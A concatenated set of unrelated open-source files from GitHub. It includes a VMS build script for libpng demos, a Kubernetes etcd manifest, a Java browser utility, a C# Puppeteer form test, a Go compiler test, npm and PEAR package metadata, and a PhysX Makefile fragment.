readpng.c readpng.h
$ CALL MAKE readpng2.OBJ "cc ''CCOPT' readpng2" -
readpng2.c readpng2.h
$ CALL MAKE writepng.OBJ "cc ''CCOPT' writepng" -
writepng.c writepng.h
$ write sys$output "Building rpng-x..."
$ CALL MAKE rpng-x.OBJ "cc ''CCOPT' rpng-x" -
rpng-x.c readpng.h
$ call make rpng-x.exe -
"LINK rpng-x,readpng,lib.opt/opt,x11.opt/opt" -
rpng-x.obj readpng.obj
$ write sys$output "Building rpng2-x..."
$ CALL MAKE rpng2-x.OBJ "cc ''CCOPT' rpng2-x" -
rpng2-x.c readpng2.h
$ call make rpng2-x.exe -
"LINK rpng2-x,readpng2,lib.opt/opt,x11.opt/opt" -
rpng2-x.obj readpng2.obj
$ write sys$output "Building wpng..."
$ CALL MAKE wpng.OBJ "cc ''CCOPT' wpng" -
wpng.c writepng.h
$ call make wpng.exe -
"LINK wpng,writepng,lib.opt/opt" -
wpng.obj writepng.obj
$ exit
$!
$!
$MAKE: SUBROUTINE !SUBROUTINE TO CHECK DEPENDENCIES
$ V = 'F$Verify(0)
$! P1 = What we are trying to make
$! P2 = Command to make it
$! P3 - P8 What it depends on
$
$ If F$Search(P1) .Eqs. "" Then Goto Makeit
$ Time = F$CvTime(F$File(P1,"RDT"))
$arg=3
$Loop:
$ Argument = P'arg
$ If Argument .Eqs. "" Then Goto Exit
$ El=0
$Loop2:
$ File = F$Element(El," ",Argument)
$ If File .Eqs. " " Then Goto Endl
$ AFile = ""
$Loop3:
$ OFile = AFile
$ AFile = F$Search(File)
$ If AFile .Eqs. "" .Or. AFile .Eqs. OFile Then Goto NextEl
$ If F$CvTime(F$File(AFile,"RDT")) .Ges. Time Then Goto Makeit
$ Goto Loop3
$NextEL:
$ El = El + 1
$ Goto Loop2
$EndL:
$ arg=arg+1
$ If arg .Le. 8 Then Goto Loop
$ Goto Exit
$
$Makeit:
$ VV=F$VERIFY(0)
$ write sys$output P2
$ 'P2
$ VV='F$Verify(VV)
$Exit:
$ If V Then Set Verify
$ENDSUBROUTINE
| {
"pile_set_name": "Github"
} |
kind: ReplicationController
apiVersion: v1
metadata:
name: etcd
labels:
etcd: "true"
spec:
replicas: 1
selector:
etcd: "true"
template:
metadata:
labels:
etcd: "true"
spec:
containers:
- name: etcd
image: quay.io/coreos/etcd:v3.0.15
command:
- "etcd"
- "--listen-client-urls=https://0.0.0.0:4001"
- "--advertise-client-urls=https://etcd.kube-public.svc:4001"
- "--trusted-ca-file=/var/run/serving-ca/ca.crt"
- "--cert-file=/var/run/serving-cert/tls.crt"
- "--key-file=/var/run/serving-cert/tls.key"
- "--client-cert-auth=true"
- "--listen-peer-urls=https://0.0.0.0:7001"
- "--initial-advertise-peer-urls=https://etcd.kube-public.svc:7001"
- "--peer-trusted-ca-file=/var/run/serving-ca/ca.crt"
- "--peer-cert-file=/var/run/serving-cert/tls.crt"
- "--peer-key-file=/var/run/serving-cert/tls.key"
- "--peer-client-cert-auth=true"
- "--initial-cluster=default=https://etcd.kube-public.svc:7001"
ports:
- containerPort: 4001
volumeMounts:
- mountPath: /var/run/serving-cert
name: volume-serving-cert
- mountPath: /var/run/serving-ca
name: volume-etcd-ca
volumes:
- secret:
defaultMode: 420
secretName: serving-etcd
name: volume-serving-cert
- configMap:
defaultMode: 420
name: etcd-ca
name: volume-etcd-ca
| {
"pile_set_name": "Github"
} |
Clan Jade Falcon Front-Line Medium Aerospace (FMU)
Visigoth B,1
Tyre 2,2
Visigoth C,3
Visigoth Prime,4
Jagatai Prime,5
Visigoth Prime,6
Visigoth A,5
Jagatai B,4
Tyre (Standard),3
Jagatai A,2
Jagatai C,1
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2010-2012 Amazon Technologies, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at:
*
* http://aws.amazon.com/apache2.0
*
* This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
* OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and
* limitations under the License.
*/
package com.amazonaws.eclipse.core;
import java.net.URL;
import org.eclipse.ui.PartInitException;
import org.eclipse.ui.PlatformUI;
import org.eclipse.ui.browser.IWorkbenchBrowserSupport;
public class BrowserUtils {
private static final int BROWSER_STYLE = IWorkbenchBrowserSupport.LOCATION_BAR
| IWorkbenchBrowserSupport.AS_EXTERNAL
| IWorkbenchBrowserSupport.STATUS
| IWorkbenchBrowserSupport.NAVIGATION_BAR;
/**
* Opens the specified URL in an external browser window.
* @param url The URL to open.
* @throws PartInitException
*/
public static void openExternalBrowser(URL url) throws PartInitException {
IWorkbenchBrowserSupport browserSupport = PlatformUI.getWorkbench().getBrowserSupport();
browserSupport.createBrowser(BROWSER_STYLE, null, null, null)
.openURL(url);
}
public static void openExternalBrowser(String url) {
try {
openExternalBrowser(new URL(url));
} catch (Exception e) {
AwsToolkitCore.getDefault().reportException(
"Unable to open external web browser to '" + url + "': " + e.getMessage(), e);
}
}
}
| {
"pile_set_name": "Github"
} |
using PuppeteerSharp;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Xunit;
namespace Element.Test.FormTests
{
[TestName("Form 表单", "基础用法")]
public class Test1 : IDemoTester
{
private ElementHandle submitButton;
private ElementHandle resetButton;
private ElementHandle[] formItems;
private string expectedDate;
public async Task TestAsync(DemoCard demoCard)
{
await AssertFillAsync(demoCard);
await submitButton.ClickAsync();
await Task.Delay(500);
var resultEl = await demoCard.Page.QuerySelectorAsync("div.el-message-box__wrapper > div > div.el-message-box__content > div.el-message-box__message > p");
var result = await resultEl.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal($"名称:测试活动,区域:Bejing,区域2:Bejing,日期:{DateTime.Now.ToString("yyyy/M/1")} 0:00:00,即时配送:False,性质:Offline,特殊资源:场地,枚举资源:Option1,活动形式:测试活动", result);
var okButton = await demoCard.Page.QuerySelectorAsync("div.el-message-box__wrapper > div > div.el-message-box__btns > button");
Assert.NotNull(okButton);
await okButton.ClickAsync();
await Task.Delay(500);
okButton = await demoCard.Page.QuerySelectorAsync("div.el-message-box__wrapper > div > div.el-message-box__btns > button");
Assert.Null(okButton);
await resetButton.ClickAsync();
await Task.Delay(50);
await AssertFormAsync(demoCard, false, new List<int>());
}
private async Task AssertFillAsync(DemoCard demoCard)
{
var filledIndexes = new List<int>();
await AssertFormAsync(demoCard, false, filledIndexes);
await submitButton.ClickAsync();
await Task.Delay(50);
await AssertFormAsync(demoCard, true, filledIndexes);
var formItem1 = formItems.FirstOrDefault();
var formItem1Input = await formItem1.QuerySelectorAsync("div.el-input > input");
var label1 = await formItem1.QuerySelectorAsync("label");
await formItem1Input.TypeAsync("测试活动");
await label1.ClickAsync();
await Task.Delay(50);
var text1 = await formItem1Input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal("测试活动", text1.Trim());
filledIndexes.Add(0);
await AssertFormAsync(demoCard, true, filledIndexes);
//跳过活动区域的测试
var formItem3 = formItems.Skip(2).FirstOrDefault();
var content3 = await formItem3.QuerySelectorAsync("div.el-form-item__content");
var selector = await content3.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix");
await selector.ClickAsync();
await Task.Delay(500);
var firstItem = await demoCard.Page.QuerySelectorAsync("div.el-select-dropdown.el-popper > div.el-scrollbar > div.el-select-dropdown__wrap.el-scrollbar__wrap > ul.el-scrollbar__view.el-select-dropdown__list > li.el-select-dropdown__item");
await firstItem.ClickAsync();
await Task.Delay(500);
var itemText = await firstItem.EvaluateFunctionAsync<string>("x=>x.innerText");
var input = await content3.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > input[type='text'][placeholder='请选择活动区域'].el-input__inner");
var selectedItemText = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal(itemText?.Trim(), selectedItemText?.Trim());
firstItem = await demoCard.Page.QuerySelectorAsync("div.el-select-dropdown.el-popper > div.el-scrollbar > div.el-select-dropdown__wrap.el-scrollbar__wrap > ul.el-scrollbar__view.el-select-dropdown__list > li.el-select-dropdown__item");
Assert.Null(firstItem);
filledIndexes.Add(2);
await AssertFormAsync(demoCard, true, filledIndexes);
//活动时间
var formItem4 = formItems.Skip(3).FirstOrDefault();
var content4 = await formItem4.QuerySelectorAsync("div.el-form-item__content");
var selector4 = await content4.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date");
await selector4.ClickAsync();
await Task.Delay(500);
var firstItem4 = await demoCard.Page.QuerySelectorAsync("div.el-picker-panel.el-date-picker.el-popper > div.el-picker-panel__body-wrapper > div.el-picker-panel__body > div.el-picker-panel__content > table > tbody > tr.el-date-table__row > td.available > div > span");
await firstItem4.ClickAsync();
var day = await firstItem4.EvaluateFunctionAsync<string>("x=>x.innerText");
expectedDate = DateTime.Now.ToString($"yyyy-MM-{day.PadLeft(2, '0')}");
await Task.Delay(500);
var input4 = await content4.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date > input[type='text'][placeholder='请选择日期'][name='Time'].el-input__inner");
var selectedItemText4 = await input4.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal(expectedDate, selectedItemText4);
firstItem4 = await demoCard.Page.QuerySelectorAsync("div.el-picker-panel.el-date-picker.el-popper > div.el-picker-panel__body-wrapper > div.el-picker-panel__body > div.el-picker-panel__content > table > tbody > tr.el-date-table__row > td.available > div > span");
Assert.Null(firstItem);
filledIndexes.Add(3);
await AssertFormAsync(demoCard, true, filledIndexes);
//即时配送
//活动性质
var formItem6 = formItems.Skip(5).FirstOrDefault();
var content6 = await formItem6.QuerySelectorAsync("div.el-form-item__content");
var checkbox6 = (await content6.QuerySelectorAllAsync("div.el-checkbox-group > label.el-checkbox > span.el-checkbox__label"))[1];
await checkbox6.ClickAsync();
await Task.Delay(50);
var checkedCheckbox6 = (await content6.QuerySelectorAsync("div.el-checkbox-group > label.el-checkbox.is-checked > span.el-checkbox__label"));
var checkboxLabel = await checkbox6.EvaluateFunctionAsync<string>("x=>x.innerText");
var checkedCheckboxLabel = await checkedCheckbox6.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal("地推活动", checkboxLabel.Trim());
Assert.Equal("地推活动", checkedCheckboxLabel.Trim());
filledIndexes.Add(5);
await AssertFormAsync(demoCard, true, filledIndexes);
//特殊资源
var formItem7 = formItems.Skip(6).FirstOrDefault();
var content7 = await formItem7.QuerySelectorAsync("div.el-form-item__content");
var radio7 = (await content7.QuerySelectorAllAsync("label.el-radio.el-radio-button--default > span.el-radio__label"))[1];
await radio7.ClickAsync();
await Task.Delay(50);
var checkedRadio7 = (await content7.QuerySelectorAsync("label.el-radio.is-checked.el-radio-button--default > span.el-radio__label"));
var radioLabel7 = await radio7.EvaluateFunctionAsync<string>("x=>x.innerText");
var checkedRadioLabel7 = await checkedRadio7.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal("线上场地免费", radioLabel7.Trim());
Assert.Equal("线上场地免费", checkedRadioLabel7.Trim());
filledIndexes.Add(6);
await AssertFormAsync(demoCard, true, filledIndexes);
//活动形式
var formItem8 = formItems.Skip(7).FirstOrDefault();
var formItem8Input = await formItem8.QuerySelectorAsync("div.el-input > input");
var label8 = await formItem1.QuerySelectorAsync("label");
await formItem8Input.TypeAsync("测试活动");
await label8.ClickAsync();
await Task.Delay(50);
var text8 = await formItem8Input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal("测试活动", text8.Trim());
filledIndexes.Add(7);
await AssertFormAsync(demoCard, true, filledIndexes);
}
private async Task AssertFormAsync(DemoCard demoCard, bool showRequired, List<int> filledIndexes)
{
var form = await demoCard.Body.QuerySelectorAsync("form.el-form--label-left.el-form");
Assert.NotNull(form);
formItems = await form.QuerySelectorAllAsync("div.el-form-item");
Assert.Equal(9, formItems.Length);
foreach (var formItem in formItems)
{
var index = Array.IndexOf(formItems, formItem);
var label = await formItem.QuerySelectorAsync("label[for='name'].el-form-item__label");
var content = await formItem.QuerySelectorAsync("div.el-form-item__content");
Assert.NotNull(content);
var contentMarginLeft = await content.EvaluateFunctionAsync<string>("x=>x.style.marginLeft");
var classList = await formItem.EvaluateFunctionAsync<string>("x=>x.classList.toString()");
var clsList = classList.Split(' ').Select(x => x.Trim()).ToArray() ?? new string[0];
string labelWidth = string.Empty;
string labelText = string.Empty;
var error = await content.QuerySelectorAsync("div.el-form-item__error");
if (index < 8)
{
Assert.NotNull(label);
labelWidth = await label.EvaluateFunctionAsync<string>("x=>x.style.width");
labelText = await label.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal("100px", contentMarginLeft);
Assert.Equal("100px", labelWidth);
if (index == 2)
{
Assert.DoesNotContain("is-required", clsList);
}
else
{
Assert.Contains("is-required", clsList);
}
}
else
{
Assert.Null(label);
Assert.True(string.IsNullOrWhiteSpace(contentMarginLeft));
Assert.True(string.IsNullOrWhiteSpace(labelWidth));
Assert.DoesNotContain("is-required", clsList);
}
if (index == 0)
{
Assert.Equal("活动名称", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-input > input[type='text'][name='Name'][placeholder='请输入内容'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
if (filledIndexes.Contains(0))
{
Assert.Null(error);
Assert.Equal("测试活动", inputValue);
}
else
{
await AssertErrorAsync(showRequired, error, "请确认活动名称");
Assert.Equal(string.Empty, inputValue);
}
continue;
}
if (index == 1)
{
Assert.Equal("活动区域", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > input[type='text'][placeholder='请选择活动区域'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal("北京", inputValue);
var icon = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > span.el-input__suffix > span.el-input__suffix-inner > i.el-input__icon.el-select__caret.el-icon-arrow-up");
Assert.NotNull(icon);
Assert.Null(error);
continue;
}
if (index == 2)
{
Assert.Equal("活动区域2", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > input[type='text'][placeholder='请选择活动区域'].el-input__inner");
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.NotNull(input);
var icon = await content.QuerySelectorAsync("div.el-select > div.el-input.el-input--suffix > span.el-input__suffix > span.el-input__suffix-inner > i.el-input__icon.el-select__caret.el-icon-arrow-up");
Assert.NotNull(icon);
Assert.Null(error);
if (filledIndexes.Contains(2))
{
Assert.Equal("北京", inputValue);
}
else
{
Assert.Equal(string.Empty, inputValue);
}
continue;
}
if (index == 3)
{
Assert.Equal("活动时间", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date > input[type='text'][placeholder='请选择日期'][name='Time'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
var icon = await content.QuerySelectorAsync("div.el-input.el-date-editor.el-input--prefix.el-input--suffix.el-date-editor--date > span.el-input__prefix > i.el-input__icon.el-icon-date");
Assert.NotNull(icon);
if (filledIndexes.Contains(index))
{
var selectedDay = await input.EvaluateFunctionAsync<string>("x=>x.value");
Assert.Equal(expectedDate, selectedDay);
Assert.Null(error);
}
else
{
Assert.Equal(string.Empty, inputValue);
await AssertErrorAsync(showRequired, error, "请确认活动时间");
}
continue;
}
if (index == 4)
{
Assert.Equal("即时配送", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-switch > input[type='checkbox'].el-switch__input");
Assert.NotNull(input);
var icon = await content.QuerySelectorAsync("div.el-switch > span.el-switch__core");
Assert.NotNull(icon);
var borderColor = await icon.EvaluateFunctionAsync<string>("x=>x.style.borderColor");
Assert.Equal("rgb(19, 206, 102)", borderColor);
var backgroundColor = await icon.EvaluateFunctionAsync<string>("x=>x.style.backgroundColor");
Assert.Equal("rgb(192, 204, 218)", backgroundColor);
Assert.Null(error);
continue;
}
if (index == 5)
{
Assert.Equal("活动性质", labelText?.Trim());
var checkboxes = await content.QuerySelectorAllAsync("div.el-checkbox-group > label.el-checkbox");
Assert.Equal(2, checkboxes.Length);
if (filledIndexes.Contains(index))
{
Assert.Null(error);
}
else
{
await AssertErrorAsync(showRequired, error, "请确认活动性质");
}
continue;
}
if (index == 6)
{
Assert.Equal("特殊资源", labelText?.Trim());
var radios = await content.QuerySelectorAllAsync("label.el-radio.el-radio-button--default");
Assert.Equal(2, radios.Length);
if (filledIndexes.Contains(index))
{
Assert.Null(error);
}
else
{
await AssertErrorAsync(showRequired, error, "请确认特殊资源");
}
continue;
}
if (index == 7)
{
Assert.Equal("活动形式", labelText?.Trim());
var input = await content.QuerySelectorAsync("div.el-input > input[type='textarea'][name='Description'][placeholder='请输入内容'].el-input__inner");
Assert.NotNull(input);
var inputValue = await input.EvaluateFunctionAsync<string>("x=>x.value");
if (filledIndexes.Contains(index))
{
Assert.Equal("测试活动", inputValue);
Assert.Null(error);
}
else
{
Assert.Equal(string.Empty, inputValue);
await AssertErrorAsync(showRequired, error, "请确认活动形式");
}
continue;
}
if (index == 8)
{
Assert.True(string.IsNullOrWhiteSpace(labelText));
submitButton = await content.QuerySelectorAsync("button.el-button.el-button--primary");
Assert.NotNull(submitButton);
resetButton = await content.QuerySelectorAsync("button.el-button.el-button--default");
Assert.NotNull(resetButton);
continue;
}
throw new Exception(index.ToString());
}
}
private static async Task AssertErrorAsync(bool showRequired, ElementHandle error, string expectedRrrorText)
{
if (showRequired)
{
Assert.NotNull(error);
var errorText = await error.EvaluateFunctionAsync<string>("x=>x.innerText");
Assert.Equal(expectedRrrorText, errorText.Trim());
}
}
}
}
| {
"pile_set_name": "Github"
} |
// compile
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// gccgo crashed compiling this.
package main
type S struct {
f [2][]int
}
func F() (r [2][]int) {
return
}
func main() {
var a []S
a[0].f = F()
}
| {
"pile_set_name": "Github"
} |
{
"name": "inherits",
"description": "Browser-friendly inheritance fully compatible with standard node.js inherits()",
"version": "2.0.1",
"keywords": [
"inheritance",
"class",
"klass",
"oop",
"object-oriented",
"inherits",
"browser",
"browserify"
],
"main": "./inherits.js",
"browser": "./inherits_browser.js",
"repository": {
"type": "git",
"url": "git://github.com/isaacs/inherits.git"
},
"license": "ISC",
"scripts": {
"test": "node test"
},
"bugs": {
"url": "https://github.com/isaacs/inherits/issues"
},
"_id": "[email protected]",
"dist": {
"shasum": "b17d08d326b4423e568eff719f91b0b1cbdf69f1",
"tarball": "http://registry.npmjs.org/inherits/-/inherits-2.0.1.tgz"
},
"_from": "inherits@>=2.0.1 <2.1.0",
"_npmVersion": "1.3.8",
"_npmUser": {
"name": "isaacs",
"email": "[email protected]"
},
"maintainers": [
{
"name": "isaacs",
"email": "[email protected]"
}
],
"directories": {},
"_shasum": "b17d08d326b4423e568eff719f91b0b1cbdf69f1",
"_resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.1.tgz",
"readme": "ERROR: No README data found!",
"homepage": "https://github.com/isaacs/inherits#readme"
}
| {
"pile_set_name": "Github"
} |
; This file is meant to be used with Onion http://c9s.github.com/Onion/
; For instructions on how to build a PEAR package of Predis please follow
; the instructions at this URL:
;
; https://github.com/c9s/Onion#a-quick-tutorial-for-building-pear-package
;
[package]
name = "Predis"
desc = "Flexible and feature-complete PHP client library for Redis"
homepage = "http://github.com/nrk/predis"
license = "MIT"
version = "0.8.7"
stability = "stable"
channel = "pear.nrk.io"
author = "Daniele Alessandri \"nrk\" <[email protected]>"
[require]
php = ">= 5.3.2"
pearinstaller = "1.4.1"
[roles]
*.xml.dist = test
*.md = doc
LICENSE = doc
[optional phpiredis]
hint = "Add support for faster protocol handling with phpiredis"
extensions[] = socket
extensions[] = phpiredis
[optional webdis]
hint = "Add support for Webdis"
extensions[] = curl
extensions[] = phpiredis
| {
"pile_set_name": "Github"
} |
# Makefile generated by XPJ for LINUX32
-include Makefile.custom
ProjectName = PhysXExtensions
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtBroadPhase.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothFabricCooker.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothGeodesicTetherCooker.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothMeshQuadifier.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtClothSimpleTetherCooker.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtCollection.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtConvexMeshExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtCpuWorkerThread.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtD6Joint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtD6JointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultCpuDispatcher.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultErrorCallback.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultSimulationFilterShader.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDefaultStreams.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDistanceJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtDistanceJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtExtensions.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtFixedJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtFixedJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtMetaData.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtParticleExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPrismaticJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPrismaticJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPvd.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtPxStringTable.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRaycastCCD.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRevoluteJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRevoluteJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtRigidBodyExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSceneQueryExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSimpleFactory.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSmoothNormals.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSphericalJoint.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtSphericalJointSolverPrep.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/ExtTriangleMeshExt.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/SnSerialUtils.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/SnSerialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/SnSerializationRegistry.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnBinaryDeserialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnBinarySerialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Align.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Convert.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Error.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_MetaData.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Output.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnConvX_Union.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Binary/SnSerializationContext.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnJointRepXSerializer.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnRepXCoreSerializer.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnRepXUpgrader.cpp
PhysXExtensions_cppfiles += ./../../PhysXExtensions/src/serialization/Xml/SnXmlSerialization.cpp
PhysXExtensions_cppfiles += ./../../PhysXMetaData/extensions/src/PxExtensionAutoGeneratedMetaDataObjects.cpp
PhysXExtensions_cpp_debug_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_debug_dep = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.debug.P, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_c_debug_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_debug_dep = $(PhysXExtensions_cpp_debug_dep) $(PhysXExtensions_cc_debug_dep) $(PhysXExtensions_c_debug_dep)
-include $(PhysXExtensions_debug_dep)
PhysXExtensions_cpp_checked_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_checked_dep = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.checked.P, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_c_checked_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_checked_dep = $(PhysXExtensions_cpp_checked_dep) $(PhysXExtensions_cc_checked_dep) $(PhysXExtensions_c_checked_dep)
-include $(PhysXExtensions_checked_dep)
PhysXExtensions_cpp_profile_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_profile_dep = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.profile.P, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_c_profile_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_profile_dep = $(PhysXExtensions_cpp_profile_dep) $(PhysXExtensions_cc_profile_dep) $(PhysXExtensions_c_profile_dep)
-include $(PhysXExtensions_profile_dep)
PhysXExtensions_cpp_release_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.P, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_cc_release_dep = $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.release.P, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_c_release_dep = $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_release_dep = $(PhysXExtensions_cpp_release_dep) $(PhysXExtensions_cc_release_dep) $(PhysXExtensions_c_release_dep)
-include $(PhysXExtensions_release_dep)
PhysXExtensions_debug_hpaths :=
PhysXExtensions_debug_hpaths += ./../../Common/include
PhysXExtensions_debug_hpaths += ./../../../../PxShared/include
PhysXExtensions_debug_hpaths += ./../../../../PxShared/src/foundation/include
PhysXExtensions_debug_hpaths += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_debug_hpaths += ./../../../../PxShared/src/pvd/include
PhysXExtensions_debug_hpaths += ./../../../Include/common
PhysXExtensions_debug_hpaths += ./../../../Include/geometry
PhysXExtensions_debug_hpaths += ./../../../Include/GeomUtils
PhysXExtensions_debug_hpaths += ./../../../Include/pvd
PhysXExtensions_debug_hpaths += ./../../../Include/cooking
PhysXExtensions_debug_hpaths += ./../../../Include/extensions
PhysXExtensions_debug_hpaths += ./../../../Include/vehicle
PhysXExtensions_debug_hpaths += ./../../../Include/cloth
PhysXExtensions_debug_hpaths += ./../../../Include
PhysXExtensions_debug_hpaths += ./../../Common/src
PhysXExtensions_debug_hpaths += ./../../GeomUtils/headers
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/contact
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/common
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/convex
